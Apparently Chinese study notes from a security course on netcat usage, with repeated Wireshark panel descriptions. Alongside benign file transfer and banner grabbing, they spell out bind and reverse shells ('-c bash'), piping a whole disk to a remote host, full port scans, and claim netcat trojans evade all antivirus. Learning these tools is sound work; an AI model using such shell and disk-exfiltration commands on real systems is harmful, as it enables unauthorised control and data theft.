nc 客户端服务器端 都可以
nc 客户端服务器端 都可以
小身材 大智慧
侦听
telnet
传输文件、文本、目录 聊天、远程电子取证
加密传输、所有流量
远程控制/木马
所有杀软都不会查杀
流媒体服务器
远程克隆硬盘
客户端、服务器端
聊天实现
服务端 nc -l -p portnumber
客户端 nc -nv ip portnumber
远程电子取证
服务端 nc -l -p portnumber
客户端 命令 | nc -nv ip portnumber 输出信息只在服务端显示
服务端 nc -l -p portnumber > filename
客户端 命令 | nc -nv ip portnumber -q 1 输出信息重定向到服务端的filename里面,-q 表示 执行完1秒后退出
常用工具
NETCAT --NC:
几百K文件大小
侦听模式/传输模式
Telnet/获取banner信息
传输文本信息
传输文本/目录
加密传输文件
远程控制/木马
加密所有流量
流媒体服务器
远程克隆硬盘
Telnet:nc -nv ip 端口
nc -nv 1.1.1.1 110
nc -nv 1.1.1.1 25
nc -nv 1.1.1.1 80
Wireshark拥有强大的过滤器引擎,用户可以使用过滤器筛选出有用的数据包,排除无关信息的干扰
Wireshark主窗口的设计包括3个面板:Packet List、Packet Details、Packet Bytes
下面介绍每个面板的内容。
Packet List(数据包列表): 最上面的面板用表格显示了当前不惑文件中的所有数据包,其中包括了数据包序号、数据包被捕获的相对时间、数据包的源地址和目的地址、数据包的协议以及在数据包中找到的概况信息等列。
Packet Details(数据包细节): 中间的面板分层地显示了一个数据包中地内容,并且可以通过展开或是收缩来显示这个数据包中所捕获地全部内容。
Packet Bytes(数据包字节): 最下面的面板可能是最令人困惑地,因为它显示了一个数据包未经处理地原始样子,也就是其在链路上传播时地样子。这些原始数据看上去一点都不舒服而且不容易理解。
Wireshark拥有强大的过滤器引擎,用户可以使用过滤器筛选出有用的数据包,排除无关信息的干扰
Wireshark主窗口的设计包括3个面板:Packet List、Packet Details、Packet Bytes
下面介绍每个面板的内容。
Packet List(数据包列表): 最上面的面板用表格显示了当前不惑文件中的所有数据包,其中包括了数据包序号、数据包被捕获的相对时间、数据包的源地址和目的地址、数据包的协议以及在数据包中找到的概况信息等列。
Packet Details(数据包细节): 中间的面板分层地显示了一个数据包中地内容,并且可以通过展开或是收缩来显示这个数据包中所捕获地全部内容。
Packet Bytes(数据包字节): 最下面的面板可能是最令人困惑地,因为它显示了一个数据包未经处理地原始样子,也就是其在链路上传播时地样子。这些原始数据看上去一点都不舒服而且不容易理解。
NETCAT
·侦听模式/传输模式
·Telnet/Banner
作为客户端的时候能连接其他服务器的服务端口并发送指令进行探测 nc-h 获取帮助
·传输文本信息
·传输文件/目录
·加密传输文件
·远程控制/木马
·加密所有流量
·流媒体服务器
·远程克隆硬盘--电子取证
NETCAT
NC
侦听模式/传输模式
telnet / 获取banner信息
nc -nv 1.1.1.1 110 (pop3)
nc -nv 1.1.1.1 25 (smtp)
nc -nv 1.1.1.1 80
-v:显示相关的详细链接信息
-n:加ip地址时不进行dns解析
传输文本信息
A:nc -l -p 4444
B:nc -nv 1.1.1.1 4444
-l:listen,打开监听一个端口
-p:指定开放端口号
-q:nc完就断开连接
A: nc -l -p 333 > ps.txt
B: ps aux | nc -nv AIP -q 1
传输文件/目录
传输文件:
A: nc -l -p 333 > 1.map4
B: nc -nv AIP 333 < 1.mp4 -q 1
或
A: nc -l -p 333 < a.mp4 -q 1
B: nc -nv AIP 333 > b.mp4
>: 表示接收方
<: 表示发送方
传输目录:
A: tar -cvf - music/ | nc -lp 333 -q 1
B: nc -nv AIP 333 | tar -xvf -
先把目录打包,在放到nc的管道中
加密传输文件
A: nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B: mcrypt --flush -Fbq -a rijndael-356 -m ecb < a.mp4 | nc -nv AIP 333 -q 1
远程控制/木马
正向:
A: nc -lp 333 -c bash
B: nc 1.1.1.1 333
反向:
A: nc -lp 333
B: nc 1.1.1.1 333 -c bash
注:Windows用户把bash改成cmd
加密所有流量
流媒体服务器
server: cat 1.mp4 | nc -lp 333
client: nc -nv serverIP 333 | mplayer -vo x11 -cache 3000 -
远程克隆硬盘
A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
端口扫描
nc -nvz 1.1.1.1 1-65535
nc-vnzu 1.1.1.1 1-1024
-z: 扫描模式
-u; 探测所有udp端口
ncat
A: ncat -c bash --allow bIP -vnl 333 --ssl
B: ncat -nv aIP 333 --ssl
nc -v显示详细连接信息
nc -vn不做域名解析即no DNS,-n后面要跟IP地址不做域名解析连接一个IP
nc -l -p 4444该命令-l是侦听一个端口,-p是指定端口号为4444起到的作用是服务端的作用
2.wireshark
3.dcpdump
NC
侦听模式/传输模式
telnet / 获取banner信息
nc -nv 1.1.1.1 110
nc -nv 1.1.1.1 25
nc -nv 1.1.1.1 80
传输文本信息
传输文件/目录
加密传输文件
远程控制/木马
加密所有流量
流媒体服务器
远程克隆硬盘